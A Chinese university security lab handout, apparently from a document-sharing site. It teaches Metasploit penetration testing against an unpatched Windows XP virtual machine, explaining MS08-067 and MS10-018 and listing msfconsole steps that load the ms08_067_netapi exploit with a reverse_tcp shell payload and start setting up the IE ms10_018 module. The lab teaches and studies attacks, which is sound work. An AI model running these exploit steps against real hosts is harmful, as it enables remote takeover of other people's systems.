计算机系统安全实验二-metasploit
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
计算机系统安全实验二-
m e t a s p l o i t
-标准化文件发布号:(9456-EUATWK-MWUB-WUNN-INNUL-DDQTY-KII
计算机系统安全实验二:
操作系统安全与metasploit渗透测试
实验目的:
学习计算机操作系统安全相关内容。
学习操作系统渗透相关内容
学习metasploit渗透工具使用。
实验原理:
Windows 操作系统安全结构
网络渗透原理
实验环境:
软件: vmware 环境下,
虚拟机, vm-WinXP镜像
虚拟机,backtrack 4及backtrack 5 虚拟机镜像等。
实验拓扑:
被渗透机:使用虚拟机XP,建议使用未安装更新的英文XP操作系统,,设置其IP地址为,自动获得,虚拟机网络连接方式 NAT方式。实验室计算机network系统下中network_vm 目录中有metasploitable_XP,可使用之。
渗透测试机:使用Bt4或5作为操作系统,
准备工作:
启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP:被渗透机:
操作系统:____windows xp with sp1_________
IP地址:____________________
渗透测试机:
操作系统:___________bt5_______
IP地址:___________________
(注意,若网络连接未启用,请先启用之,linux 下可使用ifup eth0)
实验内容:
第一部分:针对操作系统内部服务端口进行渗透
了解ms08-067漏洞详情:
(请课后上网查询相关内容)
漏洞描述:
曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。
漏洞对象:
受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows XP /2000/Vista/2003等。除Windows Server 2008 Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows 2000、Windows XP和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。
漏洞端口:
_______445_________________________________________________步骤一:
启动metasploit 控制台msfconsole
记录其
步骤二:
搜索模块 ms08-067号模块
search ms08-067
找到模块,记录其名称,级别,描述步骤三:
使用这个模块
use windows/smb/ms08_067_netapi
步骤四:
查找有用的payloads
show payloads
步骤五:
使用其中最常用的一个payload
set payload windows/shell/reverse_tcp
步骤六:
查看当前的这个payload 以及攻击所需要的参数选项
show options
发现模块所需要选项,有些有默认参数: RPORT ,SMBPIPE 有些没有RHOST
发现payload所需要参数,有些有默认参数: EXITFUNC ,LPORT 有些没有 : LHOST
渗透的目标设置值 : 0
步骤七:
设置参数
set RHOST 被渗透主机的IP地址
set LHOST 渗透测试主机的IP地址。
步骤八:
show options 查看当前参数设置是否齐全。
步骤九:
show targets 查看当前攻击的目标。
0 若有,则表示可进行自动选择攻击。
其他,则为特定选择特定系统。
步骤十:
参数齐全,目标选定,渗透载荷准备就绪,然后实施。exploit
渗透开始。。。。。
自动创建一shell (命令提示符)
使用ipconfig 及dir等命令确定当前控制的计算机是哪台。
打开放大镜:
步骤十一:
Exit 然后再exit退出。
第二部分:针对操作系统下的浏览器进行渗透
步骤一:浏览器漏洞MS10-018
了解ms10-018漏洞详情:
(请课后上网查询相关内容)
漏洞描述:
在提交数据时Internet Explorer处理使用特制编码字符串的内容的方式存在信息泄露漏洞。攻击者可以通过创建特制的网页来利用这个漏洞,如果用户查看了该网页就会导致信息泄露。成功利用这个漏洞的攻击者可以查看本地计算机或其他域或Internet Explorer 区中的其他浏览器窗口的内容。
漏洞对象:
Microsoft __Internet __Explorer SP4
漏洞端口:
8080
步骤一:
启动metasploit 控制台
msfconsole
步骤二:
搜索模块 ms10-018号模块
search ms10-018
找到模块,记录其名称,级别,描述
步骤三:
使用这个模块
use windows/browser/ms10_018_ie_behaviors
步骤四:
查找有用的payloads
show payloads